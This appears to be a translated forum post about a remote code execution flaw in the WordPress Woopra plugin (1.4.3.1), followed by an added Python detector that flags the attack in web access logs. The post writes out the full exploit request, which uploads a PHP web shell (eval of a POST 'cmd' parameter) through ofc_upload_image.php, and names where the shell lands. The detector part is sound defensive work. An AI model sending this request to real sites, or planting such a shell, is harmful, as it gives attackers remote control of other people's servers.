As usual, showing off with the English write-up: WordPress Woopra Remote Code Execution: http://www.wordpress-secure.org/ ... ote-code-execution/
This vulnerability does not work against Woopra versions above 1.4.3.1. Plugin download URL: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
Exploit request:

POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
Host: ha.cker.in
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 28

<?php eval($_POST['cmd']); ?>
The uploaded file ends up at http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
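From the defender's side, the request above leaves two recognisable traces in a web server's access log: a `name=` parameter on `ofc_upload_image.php` that is not an image file, and a later request for a `.php` file under the plugin's `tmp-upload-images/` directory. The following detector is an added example, not code from the post or the Woopra plugin; the log lines are constructed, and `has_image_extension` is the allowlist check that the vulnerable handler should have applied to `name`.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jun/2013:12:00:01 +0800] "POST /wordpress/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1" 200 63 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2013:12:00:05 +0800] "GET /wordpress/wp-content/plugins/woopra/inc/php-ofc-library/tmp-upload-images/11.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2013:12:01:00 +0800] "POST /wordpress/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 63 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Jun/2013:12:01:10 +0800] "GET /wordpress/?p=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}


def has_image_extension(name):
    """Allowlist check: exactly one dot, an image extension, no path separators or NULs."""
    base = unquote(name)
    if "/" in base or "\\" in base or "\x00" in base:
        return False
    stem, dot, ext = base.rpartition(".")
    # Reject double extensions such as x.php.png, which some handlers still execute.
    return bool(dot) and stem != "" and "." not in stem and ext.lower() in ALLOWED_EXT


def flag_upload_abuse(log_text):
    """Return (ip, filename, reason) for each log line that matches one of the two traces."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        path = parts.path
        if path.endswith("/ofc_upload_image.php"):
            name = parse_qs(parts.query).get("name", [""])[0]
            if not has_image_extension(name):
                hits.append((m.group("ip"), name, "non-image name passed to ofc_upload_image.php"))
        elif "/tmp-upload-images/" in path and path.lower().endswith(".php"):
            hits.append((m.group("ip"), path.rsplit("/", 1)[-1], "script requested from upload directory"))
    return hits


if __name__ == "__main__":
    for ip, name, reason in flag_upload_abuse(SAMPLE_LOG):
        print(f"{ip}\t{name}\t{reason}")
```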